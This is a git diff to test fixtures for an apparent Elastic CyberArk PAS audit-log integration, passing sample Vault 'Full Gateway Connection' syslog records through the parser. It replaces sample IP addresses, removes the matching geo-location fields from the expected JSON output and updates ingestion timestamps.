\u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMUnmanagedSessionAccounts\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\2\\\\\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Folder\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:01:14\",\"IsoTimestamp\":\"2021-03-11T18:01:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"187\",\"Desc\":\"Add Folder\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Add Folder\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMUnmanagedSessionAccounts\",\"File\":\"Root\\\\2\\\\\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Folder\",\"GatewayStation\":\"\"}}}", "code": "187", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log index 88926eb1571..2794595cff7 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log @@ -1,9 +1,9 @@ <5>1 2021-03-08T18:07:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:07:51","IsoTimestamp":"2021-03-08T18:07:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"37.223.7.45","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} <5>1 2021-03-10T08:31:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:31:50","IsoTimestamp":"2021-03-10T08:31:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"PasswordManager","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} <5>1 2021-03-10T22:37:00Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:37:00","IsoTimestamp":"2021-03-10T22:37:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"10.0.1.10","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-11T17:38:05Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:05\n 2021-03-11T17:38:05Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 127.0.0.1\n \n \n \n \n \n Full Gateway Connection\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:05","IsoTimestamp":"2021-03-11T17:38:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T17:48:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:22\n 2021-03-11T17:48:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 10.0.2.2\n \n \n \n \n \n Full Gateway Connection\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:22","IsoTimestamp":"2021-03-11T17:48:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T18:02:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:02:57\n 2021-03-11T18:02:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PVWAGWUser\n \n \n \n 35.192.121.42\n \n \n \n \n \n Full Gateway Connection\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:02:57","IsoTimestamp":"2021-03-11T18:02:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_SSH\n \n \n \n 81.32.170.205\n \n \n \n \n \n Full Gateway Connection\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"34.71.250.247"}}} +<5>1 2021-03-11T17:38:05Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:05\n 2021-03-11T17:38:05Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 127.0.0.1\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:05","IsoTimestamp":"2021-03-11T17:38:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.13"}}} +<5>1 2021-03-11T17:48:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:22\n 2021-03-11T17:48:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 10.0.2.2\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:22","IsoTimestamp":"2021-03-11T17:48:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.13"}}} +<5>1 2021-03-11T18:02:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:02:57\n 2021-03-11T18:02:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PVWAGWUser\n \n \n \n 67.43.156.14\n \n \n \n \n \n Full Gateway Connection\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:02:57","IsoTimestamp":"2021-03-11T18:02:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_SSH\n \n \n \n 67.43.156.13\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.15\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.15"}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json index 1f510b70d60..77fb6481866 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json @@ -66,7 +66,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025103300Z", + "ingested": "2021-12-09T13:36:39.546289100Z", "original": "\u003c5\u003e1 2021-03-08T18:07:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:07:51\",\"IsoTimestamp\":\"2021-03-08T18:07:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -97,23 +97,11 @@ "ip": "10.0.1.20" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "PVWAGWUser" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -137,7 +125,7 @@ "Administrator" ], "ip": [ - "81.32.170.205", + "67.43.156.13", "10.0.1.20" ] }, @@ -147,7 +135,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-09T08:32:51Z", "gateway_station": "10.0.1.20", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Full Gateway Connection", "source_user": "PVWAGWUser", "message": "Full Gateway Connection", @@ -161,8 +149,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025119800Z", - "original": "\u003c5\u003e1 2021-03-09T08:32:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 00:32:51\",\"IsoTimestamp\":\"2021-03-09T08:32:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:36:39.546293100Z", + "original": "\u003c5\u003e1 2021-03-09T08:32:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 00:32:51\",\"IsoTimestamp\":\"2021-03-09T08:32:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", "action": "full gateway connection", @@ -192,23 +180,11 @@ "ip": "10.0.1.20" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "37.223.7.45", "user": { "name": "PVWAGWUser" }, - "ip": "37.223.7.45" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -232,7 +208,7 @@ "Administrator" ], "ip": [ - "37.223.7.45", + "67.43.156.13", "10.0.1.20" ] }, @@ -242,7 +218,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-09T10:14:58Z", "gateway_station": "10.0.1.20", - "station": "37.223.7.45", + "station": "67.43.156.13", "action": "Full Gateway Connection", "source_user": "PVWAGWUser", "message": "Full Gateway Connection", @@ -256,8 +232,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025124900Z", - "original": "\u003c5\u003e1 2021-03-09T10:14:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:14:58\",\"IsoTimestamp\":\"2021-03-09T10:14:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"37.223.7.45\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:36:39.546296400Z", + "original": "\u003c5\u003e1 2021-03-09T10:14:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:14:58\",\"IsoTimestamp\":\"2021-03-09T10:14:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", "action": "full gateway connection", @@ -338,7 +314,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025129Z", + "ingested": "2021-12-09T13:36:39.546301900Z", "original": "\u003c5\u003e1 2021-03-10T08:31:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:31:50\",\"IsoTimestamp\":\"2021-03-10T08:31:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -421,7 +397,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025132600Z", + "ingested": "2021-12-09T13:36:39.546306600Z", "original": "\u003c5\u003e1 2021-03-10T22:37:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:37:00\",\"IsoTimestamp\":\"2021-03-10T22:37:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.10\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -445,23 +421,11 @@ } }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { "user": { @@ -493,7 +457,7 @@ ], "ip": [ "127.0.0.1", - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -501,9 +465,9 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T17:38:05Z", - "gateway_station": "81.32.170.205", + "gateway_station": "67.43.156.13", "station": "127.0.0.1", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:05\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:05Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:05\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:05Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Full Gateway Connection", "source_user": "PSMPGW_VAGRANT", "message": "Full Gateway Connection", @@ -517,8 +481,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025136100Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:05\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:05Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n 